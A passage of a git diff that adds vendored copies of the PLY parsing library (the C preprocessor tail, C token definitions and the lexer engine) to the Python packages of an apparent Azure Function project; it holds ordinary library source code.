ifstack.append((enable,iftrigger)) + if enable: + if args[0].value in self.macros: + enable = False + iftrigger = False + else: + iftrigger = True + elif name == 'if': + ifstack.append((enable,iftrigger)) + if enable: + result = self.evalexpr(args) + if not result: + enable = False + iftrigger = False + else: + iftrigger = True + elif name == 'elif': + if ifstack: + 
if ifstack[-1][0]: # We only pay attention if outer "if" allows this + if enable: # If already true, we flip enable False + enable = False + elif not iftrigger: # If False, but not triggered yet, we'll check expression + result = self.evalexpr(args) + if result: + enable = True + iftrigger = True + else: + self.error(self.source,dirtokens[0].lineno,"Misplaced #elif") + + elif name == 'else': + if ifstack: + if ifstack[-1][0]: + if enable: + enable = False + elif not iftrigger: + enable = True + iftrigger = True + else: + self.error(self.source,dirtokens[0].lineno,"Misplaced #else") + + elif name == 'endif': + if ifstack: + enable,iftrigger = ifstack.pop() + else: + self.error(self.source,dirtokens[0].lineno,"Misplaced #endif") + else: + # Unknown preprocessor directive + pass + + else: + # Normal text + if enable: + chunk.extend(x) + + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + + # ---------------------------------------------------------------------- + # include() + # + # Implementation of file-inclusion + # ---------------------------------------------------------------------- + + def include(self,tokens): + # Try to extract the filename and then process an include file + if not tokens: + return + if tokens: + if tokens[0].value != '<' and tokens[0].type != self.t_STRING: + tokens = self.expand_macros(tokens) + + if tokens[0].value == '<': + # Include <...> + i = 1 + while i < len(tokens): + if tokens[i].value == '>': + break + i += 1 + else: + print("Malformed #include <...>") + return + filename = "".join([x.value for x in tokens[1:i]]) + path = self.path + [""] + self.temp_path + elif tokens[0].type == self.t_STRING: + filename = tokens[0].value[1:-1] + path = self.temp_path + [""] + self.path + else: + print("Malformed #include statement") + return + for p in path: + iname = os.path.join(p,filename) + try: + data = open(iname,"r").read() + dname = os.path.dirname(iname) + if dname: + self.temp_path.insert(0,dname) + for tok in self.parsegen(data,filename): + yield tok + if dname: + del self.temp_path[0] + break + except IOError: + pass + else: + print("Couldn't find '%s'" % filename) + + # ---------------------------------------------------------------------- + # define() + # + # Define a new macro + # ---------------------------------------------------------------------- + + def define(self,tokens): + if isinstance(tokens,STRING_TYPES): + tokens = self.tokenize(tokens) + + linetok = tokens + try: + name = linetok[0] + if len(linetok) > 1: + mtype = linetok[1] + else: + mtype = None + if not mtype: + m = Macro(name.value,[]) + self.macros[name.value] = m + elif mtype.type in self.t_WS: + # A normal macro + m = Macro(name.value,self.tokenstrip(linetok[2:])) + self.macros[name.value] = m + elif mtype.value == '(': + # A macro with arguments + tokcount, args, positions = self.collect_args(linetok[1:]) + variadic = False + for a in args: + if variadic: + print("No more arguments may follow a variadic argument") + break + astr = "".join([str(_i.value) for _i in a]) + if astr == "...": + variadic = True + a[0].type = self.t_ID + a[0].value = '__VA_ARGS__' + variadic = True + del a[1:] + continue + elif astr[-3:] == "..." and a[0].type == self.t_ID: + variadic = True + del a[1:] + # If, for some reason, "." 
is part of the identifier, strip off the name for the purposes + # of macro expansion + if a[0].value[-3:] == '...': + a[0].value = a[0].value[:-3] + continue + if len(a) > 1 or a[0].type != self.t_ID: + print("Invalid macro argument") + break + else: + mvalue = self.tokenstrip(linetok[1+tokcount:]) + i = 0 + while i < len(mvalue): + if i+1 < len(mvalue): + if mvalue[i].type in self.t_WS and mvalue[i+1].value == '##': + del mvalue[i] + continue + elif mvalue[i].value == '##' and mvalue[i+1].type in self.t_WS: + del mvalue[i+1] + i += 1 + m = Macro(name.value,mvalue,[x[0].value for x in args],variadic) + self.macro_prescan(m) + self.macros[name.value] = m + else: + print("Bad macro definition") + except LookupError: + print("Bad macro definition") + + # ---------------------------------------------------------------------- + # undef() + # + # Undefine a macro + # ---------------------------------------------------------------------- + + def undef(self,tokens): + id = tokens[0].value + try: + del self.macros[id] + except LookupError: + pass + + # ---------------------------------------------------------------------- + # parse() + # + # Parse input text. + # ---------------------------------------------------------------------- + def parse(self,input,source=None,ignore={}): + self.ignore = ignore + self.parser = self.parsegen(input,source) + + # ---------------------------------------------------------------------- + # token() + # + # Method to return individual tokens + # ---------------------------------------------------------------------- + def token(self): + try: + while True: + tok = next(self.parser) + if tok.type not in self.ignore: return tok + except StopIteration: + self.parser = None + return None + +if __name__ == '__main__': + import ply.lex as lex + lexer = lex.lex() + + # Run a preprocessor + import sys + f = open(sys.argv[1]) + input = f.read() + + p = Preprocessor(lexer) + p.parse(input,sys.argv[1]) + while True: + tok = p.token() + if not tok: break + print(p.source, tok) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ctokens.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ctokens.py new file mode 100644 index 0000000..9189a39 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ctokens.py @@ -0,0 +1,133 @@ +# ---------------------------------------------------------------------- +# ctokens.py +# +# Token specifications for symbols in ANSI C and C++. This file is +# meant to be used as a library in other tokenizers. +# ---------------------------------------------------------------------- + +# Reserved words + +tokens = [ + # Literals (identifier, integer constant, float constant, string constant, char const) + 'ID', 'TYPEID', 'INTEGER', 'FLOAT', 'STRING', 'CHARACTER', + + # Operators (+,-,*,/,%,|,&,~,^,<<,>>, ||, &&, !, <, <=, >, >=, ==, !=) + 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'MODULO', + 'OR', 'AND', 'NOT', 'XOR', 'LSHIFT', 'RSHIFT', + 'LOR', 'LAND', 'LNOT', + 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE', + + # Assignment (=, *=, /=, %=, +=, -=, <<=, >>=, &=, ^=, |=) + 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', 'PLUSEQUAL', 'MINUSEQUAL', + 'LSHIFTEQUAL','RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', 'OREQUAL', + + # Increment/decrement (++,--) + 'INCREMENT', 'DECREMENT', + + # Structure dereference (->) + 'ARROW', + + # Ternary operator (?) + 'TERNARY', + + # Delimeters ( ) [ ] { } , . 
; : + 'LPAREN', 'RPAREN', + 'LBRACKET', 'RBRACKET', + 'LBRACE', 'RBRACE', + 'COMMA', 'PERIOD', 'SEMI', 'COLON', + + # Ellipsis (...) + 'ELLIPSIS', +] + +# Operators +t_PLUS = r'\+' +t_MINUS = r'-' +t_TIMES = r'\*' +t_DIVIDE = r'/' +t_MODULO = r'%' +t_OR = r'\|' +t_AND = r'&' +t_NOT = r'~' +t_XOR = r'\^' +t_LSHIFT = r'<<' +t_RSHIFT = r'>>' +t_LOR = r'\|\|' +t_LAND = r'&&' +t_LNOT = r'!' +t_LT = r'<' +t_GT = r'>' +t_LE = r'<=' +t_GE = r'>=' +t_EQ = r'==' +t_NE = r'!=' + +# Assignment operators + +t_EQUALS = r'=' +t_TIMESEQUAL = r'\*=' +t_DIVEQUAL = r'/=' +t_MODEQUAL = r'%=' +t_PLUSEQUAL = r'\+=' +t_MINUSEQUAL = r'-=' +t_LSHIFTEQUAL = r'<<=' +t_RSHIFTEQUAL = r'>>=' +t_ANDEQUAL = r'&=' +t_OREQUAL = r'\|=' +t_XOREQUAL = r'\^=' + +# Increment/decrement +t_INCREMENT = r'\+\+' +t_DECREMENT = r'--' + +# -> +t_ARROW = r'->' + +# ? +t_TERNARY = r'\?' + +# Delimeters +t_LPAREN = r'\(' +t_RPAREN = r'\)' +t_LBRACKET = r'\[' +t_RBRACKET = r'\]' +t_LBRACE = r'\{' +t_RBRACE = r'\}' +t_COMMA = r',' +t_PERIOD = r'\.' +t_SEMI = r';' +t_COLON = r':' +t_ELLIPSIS = r'\.\.\.' + +# Identifiers +t_ID = r'[A-Za-z_][A-Za-z0-9_]*' + +# Integer literal +t_INTEGER = r'\d+([uU]|[lL]|[uU][lL]|[lL][uU])?' + +# Floating literal +t_FLOAT = r'((\d+)(\.\d+)(e(\+|-)?(\d+))? | (\d+)e(\+|-)?(\d+))([lL]|[fF])?' + +# String literal +t_STRING = r'\"([^\\\n]|(\\.))*?\"' + +# Character constant 'c' or L'c' +t_CHARACTER = r'(L)?\'([^\\\n]|(\\.))*?\'' + +# Comment (C-Style) +def t_COMMENT(t): + r'/\*(.|\n)*?\*/' + t.lexer.lineno += t.value.count('\n') + return t + +# Comment (C++-Style) +def t_CPPCOMMENT(t): + r'//.*\n' + t.lexer.lineno += 1 + return t + + + + + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/lex.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/lex.py new file mode 100644 index 0000000..87cab12 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/lex.py @@ -0,0 +1,1099 @@ +# ----------------------------------------------------------------------------- +# ply: lex.py +# +# Copyright (C) 2001-2017 +# David M. Beazley (Dabeaz LLC) +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the David Beazley or Dabeaz LLC may be used to +# endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# ----------------------------------------------------------------------------- + +__version__ = '3.10' +__tabversion__ = '3.10' + +import re +import sys +import types +import copy +import os +import inspect + +# This tuple contains known string types +try: + # Python 2.6 + StringTypes = (types.StringType, types.UnicodeType) +except AttributeError: + # Python 3.0 + StringTypes = (str, bytes) + +# This regular expression is used to match valid token names +_is_identifier = re.compile(r'^[a-zA-Z0-9_]+$') + +# Exception thrown when invalid token encountered and no default error +# handler is defined. +class LexError(Exception): + def __init__(self, message, s): + self.args = (message,) + self.text = s + + +# Token class. This class is used to represent the tokens produced. +class LexToken(object): + def __str__(self): + return 'LexToken(%s,%r,%d,%d)' % (self.type, self.value, self.lineno, self.lexpos) + + def __repr__(self): + return str(self) + + +# This object is a stand-in for a logging object created by the +# logging module. + +class PlyLogger(object): + def __init__(self, f): + self.f = f + + def critical(self, msg, *args, **kwargs): + self.f.write((msg % args) + '\n') + + def warning(self, msg, *args, **kwargs): + self.f.write('WARNING: ' + (msg % args) + '\n') + + def error(self, msg, *args, **kwargs): + self.f.write('ERROR: ' + (msg % args) + '\n') + + info = critical + debug = critical + + +# Null logger is used when no output is generated. Does nothing. +class NullLogger(object): + def __getattribute__(self, name): + return self + + def __call__(self, *args, **kwargs): + return self + + +# ----------------------------------------------------------------------------- +# === Lexing Engine === +# +# The following Lexer class implements the lexer runtime. There are only +# a few public methods and attributes: +# +# input() - Store a new string in the lexer +# token() - Get the next token +# clone() - Clone the lexer +# +# lineno - Current line number +# lexpos - Current position in the input string +# ----------------------------------------------------------------------------- + +class Lexer: + def __init__(self): + self.lexre = None # Master regular expression. 
This is a list of + # tuples (re, findex) where re is a compiled + # regular expression and findex is a list + # mapping regex group numbers to rules + self.lexretext = None # Current regular expression strings + self.lexstatere = {} # Dictionary mapping lexer states to master regexs + self.lexstateretext = {} # Dictionary mapping lexer states to regex strings + self.lexstaterenames = {} # Dictionary mapping lexer states to symbol names + self.lexstate = 'INITIAL' # Current lexer state + self.lexstatestack = [] # Stack of lexer states + self.lexstateinfo = None # State information + self.lexstateignore = {} # Dictionary of ignored characters for each state + self.lexstateerrorf = {} # Dictionary of error functions for each state + self.lexstateeoff = {} # Dictionary of eof functions for each state + self.lexreflags = 0 # Optional re compile flags + self.lexdata = None # Actual input data (as a string) + self.lexpos = 0 # Current position in input text + self.lexlen = 0 # Length of the input text + self.lexerrorf = None # Error rule (if any) + self.lexeoff = None # EOF rule (if any) + self.lextokens = None # List of valid tokens + self.lexignore = '' # Ignored characters + self.lexliterals = '' # Literal characters that can be passed through + self.lexmodule = None # Module + self.lineno = 1 # Current line number + self.lexoptimize = False # Optimized mode + + def clone(self, object=None): + c = copy.copy(self) + + # If the object parameter has been supplied, it means we are attaching the + # lexer to a new object. In this case, we have to rebind all methods in + # the lexstatere and lexstateerrorf tables. + + if object: + newtab = {} + for key, ritem in self.lexstatere.items(): + newre = [] + for cre, findex in ritem: + newfindex = [] + for f in findex: + if not f or not f[0]: + newfindex.append(f) + continue + newfindex.append((getattr(object, f[0].__name__), f[1])) + newre.append((cre, newfindex)) + newtab[key] = newre + c.lexstatere = newtab + c.lexstateerrorf = {} + for key, ef in self.lexstateerrorf.items(): + c.lexstateerrorf[key] = getattr(object, ef.__name__) + c.lexmodule = object + return c + + # ------------------------------------------------------------ + # writetab() - Write lexer information to a table file + # ------------------------------------------------------------ + def writetab(self, lextab, outputdir=''): + if isinstance(lextab, types.ModuleType): + raise IOError("Won't overwrite existing lextab module") + basetabmodule = lextab.split('.')[-1] + filename = os.path.join(outputdir, basetabmodule) + '.py' + with open(filename, 'w') as tf: + tf.write('# %s.py. This file automatically created by PLY (version %s). 
Don\'t edit!\n' % (basetabmodule, __version__)) + tf.write('_tabversion = %s\n' % repr(__tabversion__)) + tf.write('_lextokens = set(%s)\n' % repr(tuple(self.lextokens))) + tf.write('_lexreflags = %s\n' % repr(self.lexreflags)) + tf.write('_lexliterals = %s\n' % repr(self.lexliterals)) + tf.write('_lexstateinfo = %s\n' % repr(self.lexstateinfo)) + + # Rewrite the lexstatere table, replacing function objects with function names + tabre = {} + for statename, lre in self.lexstatere.items(): + titem = [] + for (pat, func), retext, renames in zip(lre, self.lexstateretext[statename], self.lexstaterenames[statename]): + titem.append((retext, _funcs_to_names(func, renames))) + tabre[statename] = titem + + tf.write('_lexstatere = %s\n' % repr(tabre)) + tf.write('_lexstateignore = %s\n' % repr(self.lexstateignore)) + + taberr = {} + for statename, ef in self.lexstateerrorf.items(): + taberr[statename] = ef.__name__ if ef else None + tf.write('_lexstateerrorf = %s\n' % repr(taberr)) + + tabeof = {} + for statename, ef in self.lexstateeoff.items(): + tabeof[statename] = ef.__name__ if ef else None + tf.write('_lexstateeoff = %s\n' % repr(tabeof)) + + # ------------------------------------------------------------ + # readtab() - Read lexer information from a tab file + # ------------------------------------------------------------ + def readtab(self, tabfile, fdict): + if isinstance(tabfile, types.ModuleType): + lextab = tabfile + else: + exec('import %s' % tabfile) + lextab = sys.modules[tabfile] + + if getattr(lextab, '_tabversion', '0.0') != __tabversion__: + raise ImportError('Inconsistent PLY version') + + self.lextokens = lextab._lextokens + self.lexreflags = lextab._lexreflags + self.lexliterals = lextab._lexliterals + self.lextokens_all = self.lextokens | set(self.lexliterals) + self.lexstateinfo = lextab._lexstateinfo + self.lexstateignore = lextab._lexstateignore + self.lexstatere = {} + self.lexstateretext = {} + for statename, lre in lextab._lexstatere.items(): + titem = [] + txtitem = [] + for pat, func_name in lre: + titem.append((re.compile(pat, lextab._lexreflags), _names_to_funcs(func_name, fdict))) + + self.lexstatere[statename] = titem + self.lexstateretext[statename] = txtitem + + self.lexstateerrorf = {} + for statename, ef in lextab._lexstateerrorf.items(): + self.lexstateerrorf[statename] = fdict[ef] + + self.lexstateeoff = {} + for statename, ef in lextab._lexstateeoff.items(): + self.lexstateeoff[statename] = fdict[ef] + + self.begin('INITIAL') + + # ------------------------------------------------------------ + # input() - Push a new string into the lexer + # ------------------------------------------------------------ + def input(self, s): + # Pull off the first character to see if s looks like a string + c = s[:1] + if not isinstance(c, StringTypes): + raise ValueError('Expected a string') + self.lexdata = s + self.lexpos = 0 + self.lexlen = len(s) + + # ------------------------------------------------------------ + # begin() - Changes the lexing state + # ------------------------------------------------------------ + def begin(self, state): + if state not in self.lexstatere: + raise ValueError('Undefined state') + self.lexre = self.lexstatere[state] + self.lexretext = self.lexstateretext[state] + self.lexignore = self.lexstateignore.get(state, '') + self.lexerrorf = self.lexstateerrorf.get(state, None) + self.lexeoff = self.lexstateeoff.get(state, None) + self.lexstate = state + + # ------------------------------------------------------------ + # push_state() - Changes the 
lexing state and saves old on stack + # ------------------------------------------------------------ + def push_state(self, state): + self.lexstatestack.append(self.lexstate) + self.begin(state) + + # ------------------------------------------------------------ + # pop_state() - Restores the previous state + # ------------------------------------------------------------ + def pop_state(self): + self.begin(self.lexstatestack.pop()) + + # ------------------------------------------------------------ + # current_state() - Returns the current lexing state + # ------------------------------------------------------------ + def current_state(self): + return self.lexstate + + # ------------------------------------------------------------ + # skip() - Skip ahead n characters + # ------------------------------------------------------------ + def skip(self, n): + self.lexpos += n + + # ------------------------------------------------------------ + # opttoken() - Return the next token from the Lexer + # + # Note: This function has been carefully implemented to be as fast + # as possible. Don't make changes unless you really know what + # you are doing + # ------------------------------------------------------------ + def token(self): + # Make local copies of frequently referenced attributes + lexpos = self.lexpos + lexlen = self.lexlen + lexignore = self.lexignore + lexdata = self.lexdata + + while lexpos < lexlen: + # This code provides some short-circuit code for whitespace, tabs, and other ignored characters + if lexdata[lexpos] in lexignore: + lexpos += 1 + continue + + # Look for a regular expression match + for lexre, lexindexfunc in self.lexre: + m = lexre.match(lexdata, lexpos) + if not m: + continue + + # Create a token for return + tok = LexToken() + tok.value = m.group() + tok.lineno = self.lineno + tok.lexpos = lexpos + + i = m.lastindex + func, tok.type = lexindexfunc[i] + + if not func: + # If no token type was set, it's an ignored token + if tok.type: + self.lexpos = m.end() + return tok + else: + lexpos = m.end() + break + + lexpos = m.end() + + # If token is processed by a function, call it + + tok.lexer = self # Set additional attributes useful in token rules + self.lexmatch = m + self.lexpos = lexpos + + newtok = func(tok) + + # Every function must return a token, if nothing, we just move to next token + if not newtok: + lexpos = self.lexpos # This is here in case user has updated lexpos. + lexignore = self.lexignore # This is here in case there was a state change + break + + # Verify type of the token. If not in the token map, raise an error + if not self.lexoptimize: + if newtok.type not in self.lextokens_all: + raise LexError("%s:%d: Rule '%s' returned an unknown token type '%s'" % ( + func.__code__.co_filename, func.__code__.co_firstlineno, + func.__name__, newtok.type), lexdata[lexpos:]) + + return newtok + else: + # No match, see if in literals + if lexdata[lexpos] in self.lexliterals: + tok = LexToken() + tok.value = lexdata[lexpos] + tok.lineno = self.lineno + tok.type = tok.value + tok.lexpos = lexpos + self.lexpos = lexpos + 1 + return tok + + # No match. Call t_error() if defined. + if self.lexerrorf: + tok = LexToken() + tok.value = self.lexdata[lexpos:] + tok.lineno = self.lineno + tok.type = 'error' + tok.lexer = self + tok.lexpos = lexpos + self.lexpos = lexpos + newtok = self.lexerrorf(tok) + if lexpos == self.lexpos: + # Error method didn't change text position at all. This is an error. + raise LexError("Scanning error. 
Illegal character '%s'" % (lexdata[lexpos]), lexdata[lexpos:]) + lexpos = self.lexpos + if not newtok: + continue + return newtok + + self.lexpos = lexpos + raise LexError("Illegal character '%s' at index %d" % (lexdata[lexpos], lexpos), lexdata[lexpos:]) + + if self.lexeoff: + tok = LexToken() + tok.type = 'eof' + tok.value = '' + tok.lineno = self.lineno + tok.lexpos = lexpos + tok.lexer = self + self.lexpos = lexpos + newtok = self.lexeoff(tok) + return newtok + + self.lexpos = lexpos + 1 + if self.lexdata is None: + raise RuntimeError('No input string given with input()') + return None + + # Iterator interface + def __iter__(self): + return self + + def next(self): + t = self.token() + if t is None: + raise StopIteration + return t + + __next__ = next + +# ----------------------------------------------------------------------------- +# ==== Lex Builder === +# +# The functions and classes below are used to collect lexing information +# and build a Lexer object from it. +# ----------------------------------------------------------------------------- + +# ----------------------------------------------------------------------------- +# _get_regex(func) +# +# Returns the regular expression assigned to a function either as a doc string +# or as a .regex attribute attached by the @TOKEN decorator. +# ----------------------------------------------------------------------------- +def _get_regex(func): + return getattr(func, 'regex', func.__doc__) + +# ----------------------------------------------------------------------------- +# get_caller_module_dict() +# +# This function returns a dictionary containing all of the symbols defined within +# a caller further down the call stack. This is used to get the environment +# associated with the yacc() call if none was provided. +# ----------------------------------------------------------------------------- +def get_caller_module_dict(levels): + f = sys._getframe(levels) + ldict = f.f_globals.copy() + if f.f_globals != f.f_locals: + ldict.update(f.f_locals) + return ldict + +# ----------------------------------------------------------------------------- +# _funcs_to_names() +# +# Given a list of regular expression functions, this converts it to a list +# suitable for output to a table file +# ----------------------------------------------------------------------------- +def _funcs_to_names(funclist, namelist): + result = [] + for f, name in zip(funclist, namelist): + if f and f[0]: + result.append((name, f[1])) + else: + result.append(f) + return result + +# ----------------------------------------------------------------------------- +# _names_to_funcs() +# +# Given a list of regular expression function names, this converts it back to +# functions. +# ----------------------------------------------------------------------------- +def _names_to_funcs(namelist, fdict): + result = [] + for n in namelist: + if n and n[0]: + result.append((fdict[n[0]], n[1])) + else: + result.append(n) + return result + +# ----------------------------------------------------------------------------- +# _form_master_re() +# +# This function takes a list of all of the regex components and attempts to +# form the master regular expression. Given limitations in the Python re +# module, it may be necessary to break the master regex into separate expressions. 
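+#
+# As a rough illustration (not part of PLY itself), two hypothetical rules
+# t_NUMBER and t_PLUS would be folded into a single master pattern whose
+# named groups identify which rule matched:
+#
+#     >>> import re
+#     >>> master = re.compile(r'(?P<t_NUMBER>\d+)|(?P<t_PLUS>\+)')
+#     >>> master.match('42').lastgroup
+#     't_NUMBER'
+#
+# The matching engine then uses m.lastindex to select the corresponding
+# (function, token name) entry from the lexindexfunc table built below.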
+# ----------------------------------------------------------------------------- +def _form_master_re(relist, reflags, ldict, toknames): + if not relist: + return [] + regex = '|'.join(relist) + try: + lexre = re.compile(regex, reflags) + + # Build the index to function map for the matching engine + lexindexfunc = [None] * (max(lexre.groupindex.values()) + 1) + lexindexnames = lexindexfunc[:] + + for f, i in lexre.groupindex.items(): + handle = ldict.get(f, None) + if type(handle) in (types.FunctionType, types.MethodType): + lexindexfunc[i] = (handle, toknames[f]) + lexindexnames[i] = f + elif handle is not None: + lexindexnames[i] = f + if f.find('ignore_') > 0: + lexindexfunc[i] = (None, None) + else: + lexindexfunc[i] = (None, toknames[f]) + + return [(lexre, lexindexfunc)], [regex], [lexindexnames] + except Exception: + m = int(len(relist)/2) + if m == 0: + m = 1 + llist, lre, lnames = _form_master_re(relist[:m], reflags, ldict, toknames) + rlist, rre, rnames = _form_master_re(relist[m:], reflags, ldict, toknames) + return (llist+rlist), (lre+rre), (lnames+rnames) + +# ----------------------------------------------------------------------------- +# def _statetoken(s,names) +# +# Given a declaration name s of the form "t_" and a dictionary whose keys are +# state names, this function returns a tuple (states,tokenname) where states +# is a tuple of state names and tokenname is the name of the token. For example, +# calling this with s = "t_foo_bar_SPAM" might return (('foo','bar'),'SPAM') +# ----------------------------------------------------------------------------- +def _statetoken(s, names): + nonstate = 1 + parts = s.split('_') + for i, part in enumerate(parts[1:], 1): + if part not in names and part != 'ANY': + break + + if i > 1: + states = tuple(parts[1:i]) + else: + states = ('INITIAL',) + + if 'ANY' in states: + states = tuple(names) + + tokenname = '_'.join(parts[i:]) + return (states, tokenname) + + +# ----------------------------------------------------------------------------- +# LexerReflect() +# +# This class represents information needed to build a lexer as extracted from a +# user's input file. 
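+#
+# For orientation, a user's input file typically contains definitions such
+# as the following (a hypothetical sketch, not part of this module):
+#
+#     tokens = ('NUMBER', 'PLUS')
+#     t_PLUS = r'\+'
+#     t_ignore = ' \t'
+#
+#     def t_NUMBER(t):
+#         r'\d+'
+#         t.value = int(t.value)
+#         return t
+#
+# LexerReflect gathers every 't_'-prefixed symbol from such a namespace and
+# validates it before the master regular expressions are formed.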
+# ----------------------------------------------------------------------------- +class LexerReflect(object): + def __init__(self, ldict, log=None, reflags=0): + self.ldict = ldict + self.error_func = None + self.tokens = [] + self.reflags = reflags + self.stateinfo = {'INITIAL': 'inclusive'} + self.modules = set() + self.error = False + self.log = PlyLogger(sys.stderr) if log is None else log + + # Get all of the basic information + def get_all(self): + self.get_tokens() + self.get_literals() + self.get_states() + self.get_rules() + + # Validate all of the information + def validate_all(self): + self.validate_tokens() + self.validate_literals() + self.validate_rules() + return self.error + + # Get the tokens map + def get_tokens(self): + tokens = self.ldict.get('tokens', None) + if not tokens: + self.log.error('No token list is defined') + self.error = True + return + + if not isinstance(tokens, (list, tuple)): + self.log.error('tokens must be a list or tuple') + self.error = True + return + + if not tokens: + self.log.error('tokens is empty') + self.error = True + return + + self.tokens = tokens + + # Validate the tokens + def validate_tokens(self): + terminals = {} + for n in self.tokens: + if not _is_identifier.match(n): + self.log.error("Bad token name '%s'", n) + self.error = True + if n in terminals: + self.log.warning("Token '%s' multiply defined", n) + terminals[n] = 1 + + # Get the literals specifier + def get_literals(self): + self.literals = self.ldict.get('literals', '') + if not self.literals: + self.literals = '' + + # Validate literals + def validate_literals(self): + try: + for c in self.literals: + if not isinstance(c, StringTypes) or len(c) > 1: + self.log.error('Invalid literal %s. Must be a single character', repr(c)) + self.error = True + + except TypeError: + self.log.error('Invalid literals specification. literals must be a sequence of characters') + self.error = True + + def get_states(self): + self.states = self.ldict.get('states', None) + # Build statemap + if self.states: + if not isinstance(self.states, (tuple, list)): + self.log.error('states must be defined as a tuple or list') + self.error = True + else: + for s in self.states: + if not isinstance(s, tuple) or len(s) != 2: + self.log.error("Invalid state specifier %s. 
Must be a tuple (statename,'exclusive|inclusive')", repr(s)) + self.error = True + continue + name, statetype = s + if not isinstance(name, StringTypes): + self.log.error('State name %s must be a string', repr(name)) + self.error = True + continue + if not (statetype == 'inclusive' or statetype == 'exclusive'): + self.log.error("State type for state %s must be 'inclusive' or 'exclusive'", name) + self.error = True + continue + if name in self.stateinfo: + self.log.error("State '%s' already defined", name) + self.error = True + continue + self.stateinfo[name] = statetype + + # Get all of the symbols with a t_ prefix and sort them into various + # categories (functions, strings, error functions, and ignore characters) + + def get_rules(self): + tsymbols = [f for f in self.ldict if f[:2] == 't_'] + + # Now build up a list of functions and a list of strings + self.toknames = {} # Mapping of symbols to token names + self.funcsym = {} # Symbols defined as functions + self.strsym = {} # Symbols defined as strings + self.ignore = {} # Ignore strings by state + self.errorf = {} # Error functions by state + self.eoff = {} # EOF functions by state + + for s in self.stateinfo: + self.funcsym[s] = [] + self.strsym[s] = [] + + if len(tsymbols) == 0: + self.log.error('No rules of the form t_rulename are defined') + self.error = True + return + + for f in tsymbols: + t = self.ldict[f] + states, tokname = _statetoken(f, self.stateinfo) + self.toknames[f] = tokname + + if hasattr(t, '__call__'): + if tokname == 'error': + for s in states: + self.errorf[s] = t + elif tokname == 'eof': + for s in states: + self.eoff[s] = t + elif tokname == 'ignore': + line = t.__code__.co_firstlineno + file = t.__code__.co_filename + self.log.error("%s:%d: Rule '%s' must be defined as a string", file, line, t.__name__) + self.error = True + else: + for s in states: + self.funcsym[s].append((f, t)) + elif isinstance(t, StringTypes): + if tokname == 'ignore': + for s in states: + self.ignore[s] = t + if '\\' in t: + self.log.warning("%s contains a literal backslash '\\'", f) + + elif tokname == 'error': + self.log.error("Rule '%s' must be defined as a function", f) + self.error = True + else: + for s in states: + self.strsym[s].append((f, t)) + else: + self.log.error('%s not defined as a function or string', f) + self.error = True + + # Sort the functions by line number + for f in self.funcsym.values(): + f.sort(key=lambda x: x[1].__code__.co_firstlineno) + + # Sort the strings by regular expression length + for s in self.strsym.values(): + s.sort(key=lambda x: len(x[1]), reverse=True) + + # Validate all of the t_rules collected + def validate_rules(self): + for state in self.stateinfo: + # Validate all rules defined by functions + + for fname, f in self.funcsym[state]: + line = f.__code__.co_firstlineno + file = f.__code__.co_filename + module = inspect.getmodule(f) + self.modules.add(module) + + tokname = self.toknames[fname] + if isinstance(f, types.MethodType): + reqargs = 2 + else: + reqargs = 1 + nargs = f.__code__.co_argcount + if nargs > reqargs: + self.log.error("%s:%d: Rule '%s' has too many arguments", file, line, f.__name__) + self.error = True + continue + + if nargs < reqargs: + self.log.error("%s:%d: Rule '%s' requires an argument", file, line, f.__name__) + self.error = True + continue + + if not _get_regex(f): + self.log.error("%s:%d: No regular expression defined for rule '%s'", file, line, f.__name__) + self.error = True + continue + + try: + c = re.compile('(?P<%s>%s)' % (fname, _get_regex(f)), 
